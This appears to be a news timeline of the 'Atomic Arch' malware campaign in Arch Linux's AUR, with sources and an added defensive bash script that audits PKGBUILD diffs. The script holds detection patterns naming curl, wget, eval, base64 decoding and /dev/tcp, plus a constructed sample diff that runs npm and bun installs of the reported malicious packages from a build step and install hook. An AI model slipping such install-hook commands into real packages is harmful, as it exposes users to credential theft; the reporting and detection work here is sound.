Malicious Commits in Arch Linux AUR Packages Pulled npm-Based Payloads
Arch Linux users are responding to a malware incident in the Arch User Repository (AUR) after multiple user-contributed packages were modified with malicious commits that attempted to fetch npm-based payloads during installation. Reports on the aur-general mailing list and a dedicated incident thread indicate the changes inserted unexpected npm commands and behavior unrelated to the original software, with the alvr package cited as a prominent example and atomic-lockfile named among the npm packages involved.
Arch maintainers and contributors have been removing the malicious changes, tracking affected packages, and banning associated accounts while the full scope remains under investigation. The incident is reported to be limited to the AUR and does not affect Arch Linux’s official package repositories; users are being urged to avoid blindly updating AUR packages and to review PKGBUILD diffs, newly added .install files, and any unexpected npm dependencies before installing updates.

How this story unfolded
7 events from the most recent confirmed update back to the earliest known activity.
Arch says Atomic Arch incident is under control; affected package count reaches 1,579
Arch Linux developers said they had deleted all malicious commits they were aware of and believed the AUR malware incident was under control. A cited list put the number of affected AUR packages at 1,579, indicating the scope had grown beyond earlier estimates of 900+ packages.
Second Atomic Arch wave uses bun/js-digest to deliver new ELF payload
Reporting on the Atomic Arch supply-chain campaign said attackers launched a second wave that replaced the earlier npm-based payload chain with `bun install js-digest`, delivering a different malicious ELF. The update indicated the campaign expanded beyond the initial `atomic-lockfile` infostealer/rootkit delivery method.
Report says Atomic Arch hit 900+ AUR packages with eBPF rootkit
A new report on the 'Atomic Arch' supply-chain campaign said more than 900 AUR packages were backdoored after attackers adopted orphaned packages and modified PKGBUILDs to install malicious npm packages. The report also described expanded malware capabilities, including a Rust-based credential stealer with an eBPF rootkit, systemd persistence, Tor-based communications, and possible Monero cryptomining staging.
Arch Linux announces active mitigation for malicious AUR packages
Arch Linux said it was actively tracking malicious AUR commits and taking steps to prevent additional malicious updates from being pushed. The project warned users that AUR account creation, package updates, and package adoption or creation could be disrupted during mitigation efforts and advised users to review PKGBUILD and install script changes carefully.
Arch contributors begin tracking and removing affected AUR packages
Contributors opened a dedicated report thread to track affected packages, remove malicious commits, and ban related accounts. Reporting indicated the incident was limited to the AUR and did not affect Arch Linux's official package repositories.
Researchers detail 400+ compromised AUR packages in 'Atomic Arch' campaign
Researchers reported that more than 400 Arch User Repository packages were compromised in a supply chain attack dubbed 'Atomic Arch,' with attackers abusing orphan-package adoption to insert malicious PKGBUILD changes. The altered scripts fetched rogue npm packages that deployed an infostealer targeting browser credentials, SSH keys, environment variables, and cryptocurrency wallet data, while Arch maintainers reverted commits and banned the attacker accounts.
Malicious commits reported in Arch Linux AUR packages
A malware incident affecting Arch Linux's Arch User Repository was first reported on the aur-general mailing list, where user-contributed packages were found to contain malicious commits that attempted to download npm-based payloads during installation.
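The review advice above (check PKGBUILD diffs, newly added .install files, and unexpected npm or bun dependencies before installing) and the mechanism the researchers describe (orphan adoption followed by PKGBUILD edits that pull npm packages) lend themselves to a pre-install gate. The script below is an added example, not tooling from the page, from Arch Linux, or from the cited reports. It reads a unified diff of the pending changes to a local AUR clone and flags the three things the advice names. The clone path, the helper name, the tag names and the pattern list are this example's own assumptions; the two diffs it checks are constructed to resemble the reported changes and are not real packages.

```shell
#!/usr/bin/env bash
# Added example (not from the page, Arch Linux, or the cited reports): a
# pre-install review of the pending changes to an AUR package clone. Feed it
# a unified diff, e.g. (path is an assumption):
#   git -C ~/.cache/aur/alvr fetch && git -C ~/.cache/aur/alvr diff HEAD..FETCH_HEAD | audit_aur_diff
# Tag names and patterns below are ours, not an Arch convention.

# Commands a routine version bump has no reason to introduce (ERE).
SUSPICIOUS_RE='(^|[^[:alnum:]_-])(npm|npx|bun|bunx|yarn|pnpm)[[:space:]]+(install|i|add|exec|x|run)([[:space:]]|$)|(^|[^[:alnum:]_])(curl|wget)[[:space:]]|base64[[:space:]]+(-d|--decode)|(^|[^[:alnum:]_])eval[[:space:]]|/dev/tcp/|systemctl[[:space:]]+(--user[[:space:]]+)?enable'

# Dependency lines that wire in an npm/bun toolchain the package never needed.
NPM_DEP_RE='^[[:space:]]*(make|check|opt)?depends=.*(npm|nodejs|bun)'

audit_aur_diff() {
  # usage: audit_aur_diff [diff_file]   (reads stdin when no file is given)
  # Prints one "[TAG] file: text" line per finding, then a count.
  # Returns 1 if anything was flagged so it can gate an install, 0 otherwise.
  local diff_file="${1:-/dev/stdin}" file="" new_file=0 findings=0 line added
  while IFS= read -r line; do
    case "$line" in
      '--- /dev/null')
        new_file=1 ;;                      # the next +++ header is a brand-new file
      '--- '*)
        new_file=0 ;;
      '+++ b/'*)                           # git's default b/ prefix
        file="${line#+++ b/}"
        if [ "$new_file" -eq 1 ]; then
          case "$file" in
            *.install)                     # hook that pacman runs as root at install time
              printf '[NEW-INSTALL-HOOK] %s: new pacman install hook\n' "$file"
              findings=$((findings + 1)) ;;
          esac
        fi ;;
      '+'*)
        added="${line#+}"
        # install= in PKGBUILD activates a hook even if the hook file itself is unchanged
        if [ "$file" = PKGBUILD ] && printf '%s\n' "$added" | grep -Eq '^[[:space:]]*install='; then
          printf '[INSTALL-HOOK-DECLARED] %s: %s\n' "$file" "$added"
          findings=$((findings + 1))
        fi
        if [ "$file" = PKGBUILD ] && printf '%s\n' "$added" | grep -Eq "$NPM_DEP_RE"; then
          printf '[NPM-DEPENDENCY] %s: %s\n' "$file" "$added"
          findings=$((findings + 1))
        fi
        if printf '%s\n' "$added" | grep -Eq "$SUSPICIOUS_RE"; then
          printf '[SUSPICIOUS-COMMAND] %s: %s\n' "$file" "$added"
          findings=$((findings + 1))
        fi ;;
    esac
  done < "$diff_file"
  printf '%d finding(s)\n' "$findings"
  [ "$findings" -eq 0 ]
}

sample_diff() {
  # Constructed diff shaped like the reported changes (npm makedepends, new
  # install hook, npm/bun install in build and hook). Not a real package.
  cat <<'EOF'
diff --git a/PKGBUILD b/PKGBUILD
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -1,8 +1,10 @@
 pkgname=example-app
 pkgver=1.2.3
-pkgrel=1
+pkgrel=2
 pkgdesc="Example application"
-makedepends=('cmake')
+makedepends=('cmake' 'npm')
+install=example-app.install
 build() {
   cmake -B build
+  npm install atomic-lockfile
 }
diff --git a/example-app.install b/example-app.install
new file mode 100644
--- /dev/null
+++ b/example-app.install
@@ -0,0 +1,3 @@
+post_install() {
+  bun install js-digest >/dev/null 2>&1
+}
EOF
}

routine_diff() {
  # Constructed ordinary version bump with nothing to flag.
  cat <<'EOF'
diff --git a/PKGBUILD b/PKGBUILD
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -2,3 +2,3 @@
-pkgver=1.2.3
+pkgver=1.2.4
 pkgrel=1
-sha256sums=('0000')
+sha256sums=('1111')
EOF
}

# Gate a real diff when a path is given: `./audit.sh pending.diff`
if [ "$#" -gt 0 ]; then
  audit_aur_diff "$1"
fi
```

Running `sample_diff | audit_aur_diff` flags the added `npm` makedepend, the `install=` line, the two package-manager invocations, and the newly created .install file, and exits non-zero; `routine_diff | audit_aur_diff` prints zero findings and exits 0. The check is a triage aid for the diff review the advisory asks for, not a substitute for reading the PKGBUILD: an attacker can obfuscate beyond these patterns, so anything the script does flag should end the install until the change is understood.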
Sources
Over 400 Arch Linux AUR Packages Hijacked to Deploy Infostealer and eBPF Rootkit (thehackernews.com)
Atomic Arch: 900+ AUR Packages Backdoored with eBPF Rootkit (thecybersecguru.com)
400+ Arch Linux AUR Packages Compromised in a Supply Chain Attack Deploying Infostealers (cybersecuritynews.com)
Arch Linux Now Believes Malware Incident Under Control: More Than 1,500 Affected Packages (phoronix.com)
Arch Linux AUR Malware Campaign Hits Multiple User-Contributed Packages (linuxiac.com)
Atomic Arch npm Campaign Adds Malicious Dependency (sonatype.com)
AUR REPORT THREAD - aur-general (lists.archlinux.org)